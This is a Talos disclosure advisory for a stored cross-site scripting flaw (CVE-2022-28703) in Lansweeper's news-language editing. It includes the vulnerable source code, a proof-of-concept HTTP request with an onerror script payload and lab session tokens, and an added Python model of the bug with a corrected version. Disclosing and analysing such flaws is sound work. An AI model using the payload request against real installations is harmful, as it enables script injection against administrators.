CVE-2022-28703
A stored cross-site scripting vulnerability exists in the HdConfigActions.aspx altertextlanguages functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary JavaScript code injection. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Lansweeper lansweeper 10.1.1.0
lansweeper - https://www.lansweeper.com/
9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-80 - Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.
An exploitable stored XSS vulnerability is reachable through the action Configuration -> News page -> Alter language data, when any language other than English is chosen. The vulnerable code is located in the \LS\CF\HdConfigActions.cs file.
Let us take a close look at the vulnerable source code:
Line 1 int newsID = int.Parse(current.Request["id"]);
Line 2 string reqType = current.Request["type"];
Line 3 (...)
Line 4 case "news":
Line 5 delteSQL = "DELETE FROM htblnewsLang WHERE newsid = @p1";
Line 6 insertSQL = "INSERT htblnewsLang (newsid, [language], description, [text]) VALUES (@p1,@p2,@p3,@p4)";
Line 7 break;
Line 8 (...)
Line 9 DB.ExecuteNonQuery(delteSQL, DB.NewDBParameter("@p1", newsID));
Line 10 foreach (Language langID in Enum.GetValues(typeof(Language)))
Line 11 {
Line 12 if (langID != Language.Eng)
Line 13 {
Line 14 DB.ExecuteNonQuery(insertSQL, DB.NewDBParameter("@p1", newsID), DB.NewDBParameter("@p2", (int)langID), DB.NewDBParameter("@p3", current.Request["lang" + (int)langID] ?? ""), DB.NewDBParameter("@p4", array[(int)(langID - 1)]), DB.NewDBParameter("@p5", (reqType == "news") ? HtmlSanitizer.SanitizeHtml(dictionary2[langID]) : dictionary2[langID]));
Line 15 }
Line 16 }
The part of the request that reaches this code looks like this:
REQUEST
POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
(...)
POST DATA:
lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>
During the news alter operation, languages other than English are handled by the dedicated insert SQL query (Lines 12-14). As you may notice, none of the passed news parameters is sanitized before insertion into the database:
description - lang24=xss_entry
news text - lang24x=<img src=1 onerror=alert(1)>
There is an attempt at sanitization for parameter @p5 (HtmlSanitizer.SanitizeHtml), but the news insert query (Line 6) has only four placeholders, @p1 to @p4, so the sanitized value is never used; the raw news text bound to @p4 is stored unchanged. The news text does not appear to be sanitized or encoded on output either.
The injected code is triggered each time a user opens this news item for editing.
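The following is an added example, not Lansweeper code, that models the parameter-plumbing bug described above against an in-memory SQLite table: the sanitized copy of the news text is bound to a fifth parameter that the four-placeholder INSERT never references, so the raw payload is what gets stored. The table layout, the Language enum members other than Eng (the ids 24 and 30 are taken from the PoC request, their names are assumed), the allowlist sanitizer standing in for HtmlSanitizer.SanitizeHtml, and the form dictionary are all constructed for this illustration. The fixed=True path shows the minimal correction: bind the sanitized text to the placeholder the statement actually uses.

```python
"""Model of the vulnerable altertextlanguages handler, plus a fixed variant.

Added example, not Lansweeper code. Table layout, enum ids other than Eng,
the sanitizer and the form body are constructed to mirror the advisory.
"""
import sqlite3
from enum import IntEnum
from html import escape
from html.parser import HTMLParser


class Language(IntEnum):
    Eng = 1      # the only member named in the advisory's snippet
    L24 = 24     # ids seen in the PoC request; names are assumptions
    L30 = 30


ALLOWED_TAGS = {"div", "p", "br", "b", "i"}


class AllowlistSanitizer(HTMLParser):
    """Stand-in for HtmlSanitizer.SanitizeHtml: keeps a few structural tags,
    drops every attribute (so on* handlers and style disappear), drops any
    other tag, and escapes text content."""

    def __init__(self):
        super().__init__()
        self.out = []

    def handle_starttag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")

    def handle_startendtag(self, tag, attrs):
        if tag in ALLOWED_TAGS:
            self.out.append(f"<{tag}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data, quote=False))


def sanitize_html(raw):
    parser = AllowlistSanitizer()
    parser.feed(raw)
    parser.close()
    return "".join(parser.out)


SCHEMA = ("CREATE TABLE htblnewsLang "
          "(newsid INTEGER, language INTEGER, description TEXT, text TEXT)")
DELETE_SQL = "DELETE FROM htblnewsLang WHERE newsid = :p1"
# Same shape as the advisory's insert: exactly four placeholders, p1..p4.
INSERT_SQL = ("INSERT INTO htblnewsLang (newsid, language, description, text) "
              "VALUES (:p1, :p2, :p3, :p4)")


def new_db():
    db = sqlite3.connect(":memory:")
    db.execute(SCHEMA)
    return db


def alter_text_languages(db, news_id, form, fixed=False):
    """form maps request field names (lang24, lang24x, ...) to their values."""
    db.execute(DELETE_SQL, {"p1": news_id})
    for lang in Language:
        if lang == Language.Eng:
            continue
        description = form.get(f"lang{int(lang)}", "")
        text = form.get(f"lang{int(lang)}x", "")
        sanitized = sanitize_html(text)
        if fixed:
            # Corrected plumbing: the value the statement actually uses for
            # the text column is the sanitized one; description is escaped.
            params = {"p1": news_id, "p2": int(lang),
                      "p3": escape(description, quote=False), "p4": sanitized}
        else:
            # Vulnerable plumbing, as in the advisory: the sanitized copy is
            # bound to :p5, which the statement never references, while the
            # raw text is bound to :p4 and lands in the table unchanged.
            # (sqlite3, like ADO.NET, silently ignores the unused parameter.)
            params = {"p1": news_id, "p2": int(lang), "p3": description,
                      "p4": text, "p5": sanitized}
        db.execute(INSERT_SQL, params)
    db.commit()


def stored_text(db, news_id, lang):
    row = db.execute(
        "SELECT text FROM htblnewsLang WHERE newsid = ? AND language = ?",
        (news_id, int(lang))).fetchone()
    return row[0] if row else None


# Constructed form body mirroring the PoC request in the advisory.
POC_FORM = {
    "lang1": "eng_new", "lang1x": "eng_new_text",
    "lang24": "xss_entry", "lang24x": "<img src=1 onerror=alert(1)>",
    "lang30": "Magic",
    "lang30x": '<div style="font:12px Arial,Verdana;">Some news text<br style=""></div>',
}

if __name__ == "__main__":
    db = new_db()
    alter_text_languages(db, 3, POC_FORM)
    print("vulnerable:", stored_text(db, 3, 24))   # raw payload persisted
    alter_text_languages(db, 3, POC_FORM, fixed=True)
    print("fixed:", stored_text(db, 3, 24))        # '' (img tag dropped)
    print("fixed:", stored_text(db, 3, 30))        # '<div>Some news text<br></div>'
```

Because news text is legitimately rich HTML (the PoC's lang30x field carries a styled div), plain output encoding on the edit page would break the feature; the durable fix is input sanitization that actually reaches the stored column, with the same sanitizer applied again where the text is rendered.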
REQUEST
POST /configuration/HdConfigActions.aspx?action=altertextlanguages&type=news&id=3 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 837
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/configuration/MainPage/
Cookie: UserSettings=language=24; ASP.NET_SessionId=s3bal3hgmqgscqihm3vxj5gt; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r50bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
__VIEWSTATE=&lang1=eng_new&lang1x=eng_new_text&lang24=xss_entry&lang24x=<img src=1 onerror=alert(1)>&lang30=Magic&lang30x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&lang34=Magic&lang34x=<div style="font:12px Arial,Verdana;font-size:12px;font-family:Arial,Verdana;">Some news text<br style=""></div>&id=3&type=news&undefined=undefined&chksm=6740673596&__RequestVerificationToken=LCEp+vTDGHE23M5WuFdmjkRUlRS/DSdWiI/M7gs3RxuLXvxiMI9MiWihGndb3j1GaSLAhRww0iwriAEMcPmF4AzPEN50y2dmrSH3dUNVM+n0PtKlrw8vFGFigInLwkFYebmGC/fbz0Lo2lx7Myi0Ce2huzL/7QsGyGsj4We5WVg=
RESPONSE
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 03 Jun 2022 09:01:34 GMT
Connection: close
Content-Length: 167
{"ErrorType":"","Error":false,"Emsg":"","AddedRows":[["eng_new","",""]],"Columns":[],"Columnwid":[],"Action":"","ReturnValues":{},"ReturnValue":"","ReturnObject":null}
2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.